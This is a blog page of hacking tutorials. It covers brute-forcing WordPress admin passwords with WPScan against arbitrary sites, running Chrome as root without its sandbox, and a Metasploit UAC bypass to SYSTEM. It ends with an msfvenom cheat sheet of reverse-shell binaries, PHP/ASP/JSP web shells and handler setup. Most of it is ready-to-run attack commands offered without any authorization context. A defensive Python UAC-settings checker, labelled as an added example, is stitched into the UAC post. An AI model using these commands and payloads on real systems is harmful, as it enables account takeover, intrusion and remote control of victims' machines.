Blogger news

Thursday, August 25, 2016

Wordpress Admin username's Password Brute Force Attack


Open a terminal in Kali Linux, type 'wpscan --url http://site.com/ --enumerate u' and hit enter. Wait a few minutes and you will get the users of the website. Now you need a wordlist (I don't have any wordlist, so make your own; I will share the link of a wordlist in the comments when I make my own wordlist or find one). Save the wordlist you created or downloaded on the desktop as 'wordlist'. Now type 'wpscan --url http://site.com/ --wordlist '/path/wordlist.txt' --username USERNAME HERE' (for this step you can drag and drop the wordlist onto the terminal) and hit enter, then wait a few minutes for the BRUTE FORCE to check the passwords. You will get the password of the admin user 'IF YOUR LUCK IS WITH YOU'.

Commands -
root@kali:~# wpscan --url http://site.com/ --enumerate u
root@kali:~# wpscan --url http://site.com/ --wordlist '/path of wordlist/wordlist.txt' --username USERNAME

Note - This will only work when the admin user's password is in your wordlist. Sometimes the terminal will ask you about 'redirection'; simply type 'Y' and hit enter.
PM me if you face any problem while brute forcing the password

Wednesday, August 17, 2016

[Kali Tut] - How to run Google Chrome on Kali Linux 2.0 as root

Hi guys!

With Kali Linux 2.0, Google Chrome does not start under the root account.
Today I will post for you how to start Google Chrome on Kali Linux 2.0 as root.

  1. Run Google Chrome as root from the terminal
  • # cd /opt/google/chrome
  • # nano google-chrome
  • add the line: --user-data-dir
  • save the edited file
  • open a terminal and execute the command: # google-chrome --no-sandbox
  2. Run Google Chrome as root from the shortcut
  • # cd /opt/google/chrome
  • # nano google-chrome
  • add the line: --user-data-dir --no-sandbox
  • save the edited file
  • launch Google Chrome from the desktop


Done!
Good luck!
Facebook: https://facebook.com/pentester72
Youtube: https://www.youtube.com/channel/UCwLM5caRRGycxqxkVjDz0lg

Sunday, August 14, 2016

Bypass UAC and get admin privilege in windows 7 using metasploit

Sometimes when you exploit a security hole and successfully gain access to the target system, you usually act only as the logged-in user and not as the local SYSTEM account. This tip shows a simple way to escalate your privileges once you are inside meterpreter.

The picture below was taken after I successfully gained access using a payload I created.

meterpreter > getuid

When we run the getuid command we see that we are running as the user who is already logged in to the system, not as the SYSTEM account. How do we escalate our privileges to the SYSTEM account?



The session only has limited user rights. This can severely limit the actions you can perform on the remote system, such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, 'getsystem', that uses a number of different techniques to attempt to gain SYSTEM-level privileges on the remote system. There are also various other (local) exploits that can be used to escalate privileges.

meterpreter > use priv

meterpreter > getsystem

To make use of the 'getsystem' command, if it is not already loaded we first need to load the 'priv' extension.





We will let Metasploit do the heavy lifting for us by running "getsystem" without any options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails, depending on the operating system and the exploitation method we are using.

In the image above we only have access to a normal user account with limited privileges; running the post/windows/gather/win_privs module lists the privileges of the currently logged-in user.

For this tutorial we are exploiting Windows 7 as the victim machine; running the sysinfo command in your meterpreter shell gives you information about the exploited system.

meterpreter > sysinfo

meterpreter > run post/windows/gather/win_privs

If the getsystem code detects that it is running on Windows 7 with UAC disabled and as a local admin, it will use the read-registry method.

When we run getsystem it fails because the currently logged-in user does not have enough privilege to obtain admin rights, and on Windows 7 in particular UAC is enabled by default.
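The post hinges on how UAC is configured: getsystem's registry method works when UAC is switched off, while the bypassuac module relies on UAC sitting at its default level, where signed Windows binaries auto-elevate for members of the Administrators group without a prompt. The following Python script is an added example, not from the original post or from Metasploit: it grades a host's UAC posture from the text that `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` prints. The key and value names are Windows' own; the sample output and the verdict labels are constructed for this example.

```python
"""Grade a Windows host's UAC settings from the output of
`reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`.

Added example (not from the original post or from Metasploit).  The key and
value names are Windows' own; the sample output and the verdict labels are
constructed for this example."""
import re

# Documented meanings of ConsentPromptBehaviorAdmin.
ADMIN_PROMPT = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries (Windows default)",
}

# One `reg query` value line, e.g. "    EnableLUA    REG_DWORD    0x1"
VALUE_RE = re.compile(r"^\s*(\w+)\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$")


def parse_reg_query(text):
    """Return {value_name: int} for the REG_DWORD lines in reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def assess_uac(values):
    """Return (verdict, findings).  A missing value falls back to the setting
    Windows applies when none is present (EnableLUA=1,
    ConsentPromptBehaviorAdmin=5, PromptOnSecureDesktop=1)."""
    enable_lua = values.get("EnableLUA", 1)
    admin = values.get("ConsentPromptBehaviorAdmin", 5)
    secure = values.get("PromptOnSecureDesktop", 1)
    if enable_lua == 0:
        # The "UAC disabled" case in the post: an Administrators-group logon
        # is already fully elevated, so no bypass is needed at all.
        return "disabled", ["EnableLUA=0: UAC is off; members of Administrators log on fully elevated"]
    findings = []
    if admin in (0, 5):
        # Auto-elevation of signed Windows binaries is what the bypassuac
        # class of techniques depends on; 'Always notify' (2) removes it.
        findings.append(f"ConsentPromptBehaviorAdmin={admin} ({ADMIN_PROMPT[admin]}); set it to 2")
    if secure == 0:
        findings.append("PromptOnSecureDesktop=0: the prompt appears on the interactive desktop, where another process can draw over it; set it to 1")
    if admin in (0, 5):
        return "auto-elevation allowed", findings
    if admin == 2 and secure == 1:
        return "always notify", findings
    return "prompts", findings


# Constructed sample: the out-of-the-box Windows 7 values the post runs against.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
"""

if __name__ == "__main__":
    verdict, findings = assess_uac(parse_reg_query(SAMPLE_REG_QUERY))
    print("UAC posture:", verdict)
    for finding in findings:
        print(" -", finding)
```

The verdict "auto-elevation allowed" on the default values is the configuration the post's bypassuac step targets; "always notify" (ConsentPromptBehaviorAdmin=2 with PromptOnSecureDesktop=1) is the setting that closes that path, and "disabled" is the case where getsystem's registry method needs no bypass.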


So we first try to bypass UAC on Windows 7. Luckily there is a Windows UAC bypass exploit in Metasploit.

Meterpreter on Kali no longer recognizes "run bypassuac"; instead we have to use exploit/windows/local/bypassuac.

BypassUAC is an exploit that allows you to bypass Windows UAC on Windows Vista and Windows 7, on both x86 and x64 operating systems. This issue has still not been patched to date and can still be exploited on the most recent operating systems.

For that we need to background the session, manually run the bypassuac exploit against the session we just backgrounded, and then execute getsystem in the new session to get admin privileges.

meterpreter > background

msf > search uac

msf > use exploit/windows/local/bypassuac

I exploited this machine with the payload I created before, so try the method you used for exploiting the machine before.

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp

msf exploit(bypassuac) > set LHOST 192.168.31.20

msf exploit(bypassuac) > set LPORT 8080

msf exploit(bypassuac) > set SESSION 1

msf exploit(bypassuac) > exploit

After getting access, try the getsystem command.

meterpreter > getsystem


Done!

Saturday, August 6, 2016

Creating Metasploit Payloads on Kali Linux 2.0 Rolling


Often one of the most useful (and, to the beginner, underrated) abilities of Metasploit is the msfpayload module, now provided by msfvenom. Multiple payloads can be created with it, and it can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run 'set payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.). Execute and wait for the payload to be run. The examples below are pretty self-explanatory, but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

List Payloads

msfvenom -l

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format, one command per line, saved as a resource file:

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are completed, the following command will execute your handler: 'msfconsole -L -r '